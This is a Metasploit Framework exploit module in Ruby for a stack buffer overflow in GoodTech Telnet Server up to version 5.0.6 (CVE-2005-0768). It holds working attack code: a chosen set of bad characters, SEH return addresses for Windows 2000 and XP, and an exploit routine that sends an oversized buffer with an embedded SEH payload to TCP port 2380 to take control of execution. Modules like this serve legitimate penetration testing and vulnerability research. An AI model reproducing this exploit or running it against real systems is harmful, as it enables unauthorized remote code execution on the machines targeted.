## # $Id$ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote include Msf::Exploit::Remote::Tcp include Msf::Exploit::Remote::Seh def initialize(info = {}) super(update_info(info, 'Name' => 'GoodTech Telnet Server <= 5.0.6 Buffer Overflow', 'Description' => %q{ This module exploits a stack overflow in GoodTech Systems Telnet Server versions prior to 5.0.7. By sending an overly long string, an attacker can overwrite the buffer and control program execution. }, 'License' => MSF_LICENSE, 'Author' => 'MC', 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2005-0768' ], [ 'OSVDB', '14806'], [ 'BID', '12815' ], ], 'DefaultOptions' => { 'EXITFUNC' => 'thread', }, 'Payload' => { 'Space' => 400, 'BadChars' => "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c", 'PrependEncoder' => "\x81\xc4\xff\xef\xff\xff\x44", }, 'Platform' => 'win', 'Targets' => [ [ 'Windows 2000 Pro English All', { 'Ret' => 0x75022ac4 } ], [ 'Windows XP Pro SP0/SP1 English', { 'Ret' => 0x71aa32ad } ], ], 'Privileged' => true, 'DisclosureDate' => 'Mar 15 2005', 'DefaultTarget' => 0)) register_options([ Opt::RPORT(2380) ], self) end def exploit connect sploit = rand_text_english(10020, payload_badchars) seh = generate_seh_payload(target.ret) sploit[10012, seh.length] = seh print_status("Trying target #{target.name}...") sock.put(sploit + "\r\n\r\n") handler disconnect end end